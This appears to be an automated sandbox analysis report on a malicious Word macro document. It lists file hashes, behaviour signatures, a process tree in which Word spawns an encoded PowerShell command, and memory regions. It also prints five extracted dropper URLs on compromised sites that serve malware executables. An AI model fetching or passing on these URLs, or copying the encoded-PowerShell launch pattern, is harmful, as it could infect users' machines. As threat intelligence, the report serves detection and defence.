Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-05-2024 02:20

General

  • Target

    85b92183de7b6dd1cb319e8ceb6fad3a_JaffaCakes118.doc

  • Size

    164KB

  • MD5

    85b92183de7b6dd1cb319e8ceb6fad3a

  • SHA1

    a31fabbdc0e16ceeff3a7c4ae7619934e98b4b76

  • SHA256

    27965403597d9dce6ba0fbc8d3f907fcf228898f52db58015a628f15335efcc4

  • SHA512

    27caebbd134fce7b07fe7503bba05a0ca446059c17605e2f2470c2d35a743d9158d34bf5f65bfcf1174e4481d56d04375601c9608aeb20d56eaefbd4d330fb2d

  • SSDEEP

    3072:h77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qyTl7IlSeAvMnyor/6GNRj8dK:h77HUUUUUUUUUUUUUUUUUUUT52Vzl7Uj

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://programmephenix.com/wp-content/languages/kjdx0ls2/
    http://axletime.com/wp-admin/r0gmx40208/
    http://5elements-development.com/wp-content/uoesp16/
    http://bestphotographytnj.com/rrm9/lm83yx518/
    http://citilinesholdings.com/wp/cysk9wh832/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85b92183de7b6dd1cb319e8ceb6fad3a_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
      powErSHell -e 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      0b5498d6e7bbb1de48876d3869f195f0

      SHA1

      2d8585484892bc10738a7b1593c8e1f330edd926

      SHA256

      a83d1446e1a75247ac4ee279bb5212d9a009a8eabe91352fbee1e6fa14d1c41c

      SHA512

      2efac4de9fdb8339fce08be360390e93c9c751b382e257e76423e02cb860dddcf4a49d8d8a18e38b9fa7d148fc88573a74fbc687d301e91e1a90f7d971cbf0a8

    • memory/2164-16-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-8-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-7-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-9-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-10-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-12-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-18-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-52-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-2-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2164-13-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-17-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-14-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-51-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2164-30-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2164-31-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-0-0x000000002FC51000-0x000000002FC52000-memory.dmp

      Filesize

      4KB

    • memory/2944-25-0x00000000027E0000-0x00000000027E8000-memory.dmp

      Filesize

      32KB

    • memory/2944-24-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB